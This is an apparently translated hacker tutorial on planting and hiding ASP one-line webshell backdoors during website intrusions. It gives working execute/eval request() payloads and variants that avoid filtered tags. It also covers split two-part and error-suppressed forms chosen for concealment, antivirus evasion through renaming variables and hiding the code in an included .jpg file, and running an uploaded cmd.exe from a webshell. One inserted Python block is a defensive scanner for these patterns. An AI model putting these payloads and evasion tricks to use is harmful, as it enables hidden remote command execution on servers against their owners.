During an intrusion we often run into this problem: the big trojan cannot be uploaded, so what do we do? In that case we can only rely on the pony (the one-sentence trojan) for help. But then the pony statement gets killed again. Today let's talk about how to keep the pony from being killed.
The one-sentence statement is <% execute request("password") %>
1. What should I do if the <% and %> symbols are filtered during the intrusion? We can avoid <% and %> entirely:
<Script language=VBScript runat=server>execute request("cmd")</Script>
2. The smallest trojan code circulating on the network is <% eval request("#") %>. What if the connection fails? Just write the trojan in two separate parts:
<% Y = request("x") %> <% execute(Y) %>
This way the two parts can be submitted to the database separately.
However, in an ACCESS database the physical position of newly added data is before the old data, so you must write the <% execute(Y) %> part first. When entering the password on the client you can enter any character except "x"; if you enter "x", an error occurs.
3. Inserting the one-sentence trojan is prone to errors. For example:
Sub unlockPost()
Dim id, replyid, rs, posttable
id = Request("id")
replyid = Request("replyid")
If Not IsNumeric(id) or id = "" Then
Write it as:
Sub unlockPost(<% eval request("#") %>)
Dim id, replyid, rs, posttable
id = Request("id")
replyid = Request("replyid")
If Not IsNumeric(id) or id = "" Then
You can also write it in a fault-tolerant form:
<% If request("cmd") <> "" then execute request("cmd") %>
4. Transforming the one-sentence trojan into a two-sentence trojan!
One-sentence trojan server-side prototype: <% execute request("value") %>
After transformation: <% On Error Resume Next: execute request("value") %>
Why do we need the two-sentence trojan? Because it makes our backdoor more concealed.
I have also tried inserting the one-sentence trojan into an ASP file of WellShell, but errors often occurred on access, while after inserting the two-sentence trojan the server side could be accessed normally and it had no effect on the site's pages.
This way the website backdoor is more concealed, and the administrator will not delete all the webpage files.
My WellShell now has such a backdoor. When selecting the ASP file into which to insert the two sentences, note that you should select an ASP file that can be accessed from IE, not files such as conn.asp. Of course, the client connecting to the trojan still uses the unmodified one-sentence trojan client.
5. Making the one-sentence trojan undetectable:
I. Deformation method
For example, a horse like eval(request("#")) is generally not killed. But in fact anti-virus software often lists eval(request as a signature. So let's make some changes:
E = request("id")
Eval(E)
This way the detection is avoided.
For example, <% execute request("1") %> after deformation becomes:
<% E = request("1")
Execute E %>
Of course, this kind of deformation is the easiest to do.
II. The second method: many administrators are smart and will check ASP files for the execute and eval functions. No matter how you deform it, the code still has to use one of these functions to be interpreted, so it is still found. OK, so we can call it from an external file instead. Create a.jpg, or any file suffix or file name that will not be noticed, and write execute(request("#")) into it (of course you can deform it first and then put it in). Then insert
<!-- #include file="a.jpg" -->
into the ASP file to reference it.
However, the administrator can still find the modified file by comparing files, but that is another matter.
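As an added defensive example (not code from the original post), the following Python scanner flags the variants described above in ASP source: execute/eval applied directly to request(), the split assign-then-execute form (also across separate <% %> blocks), a <Script runat=server> block carrying execute/eval, and a server-side include of a file with a non-ASP extension. The SAMPLES fragments are constructed here for the demonstration.

```python
import re

# Constructed sample fragments, one per variant discussed above (not real site code).
SAMPLES = {
    "plain": '<% execute request("password") %>',
    "script_tag": '<Script language=VBScript runat=server>execute request("cmd")</Script>',
    "split": '<% Y = request("x") %>\n<p>hello</p>\n<% execute(Y) %>',
    "on_error": '<% On Error Resume Next: execute request("value") %>',
    "include": '<!-- #include file="a.jpg" -->',
    "benign": '<% id = Request("id")\nIf Not IsNumeric(id) Then Response.End %>',
}

# execute/eval applied directly to request(...), with or without parentheses.
DIRECT = re.compile(r'\b(execute|eval)\s*\(?\s*request\s*\(', re.I)
# A variable assigned from request(...); its name is checked against later execute/eval.
ASSIGN = re.compile(r'\b([a-z_]\w*)\s*=\s*request\s*\(', re.I)
INCLUDE = re.compile(r'<!--\s*#include\s+(?:file|virtual)\s*=\s*"([^"]+)"', re.I)
SERVER_SCRIPT = re.compile(r'<script[^>]*runat\s*=\s*"?server', re.I)
ASP_EXT = (".asp", ".inc", ".asa")


def scan(src):
    """Return a list of findings for one ASP source text (empty list = nothing found)."""
    findings = []
    if DIRECT.search(src):
        findings.append("execute/eval applied directly to request()")
    for m in ASSIGN.finditer(src):
        var = re.escape(m.group(1))
        # Look past the assignment for execute/eval of the same variable; this also
        # catches the two-block <% Y = request("x") %> ... <% execute(Y) %> form.
        if re.search(r'\b(execute|eval)\s*\(?\s*' + var + r'\b', src[m.end():], re.I):
            findings.append(f"request() stored in {m.group(1)} then executed")
    for m in INCLUDE.finditer(src):
        if not m.group(1).lower().endswith(ASP_EXT):
            findings.append(f"server-side include of non-ASP file {m.group(1)}")
    if SERVER_SCRIPT.search(src) and re.search(r'\b(execute|eval)\b', src, re.I):
        findings.append("<script runat=server> block containing execute/eval")
    return findings


def scan_all(samples=SAMPLES):
    """Scan every sample and map its name to its findings."""
    return {name: scan(src) for name, src in samples.items()}


if __name__ == "__main__":
    for name, hits in scan_all().items():
        print(f"{name}: {hits or 'clean'}")
```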
6. Using the command prompt in WEBSHELL
Upload cmd.exe to your WEBSHELL directory (for any other directory, copy the absolute path of the uploaded cmd.exe), then modify your WEBSHELL: find the code that calls CMD.EXE. The original code is as follows:
.Exec("cmd.exe /c " & DefCmd).stdout.readall
Change it to
.Exec("<absolute path of the uploaded cmd.exe> /c " & DefCmd).stdout.readall
For example, if you uploaded it to D:\web\www\cmd.exe, change it to
.Exec("D:\web\www\cmd.exe /c " & DefCmd).stdout.readall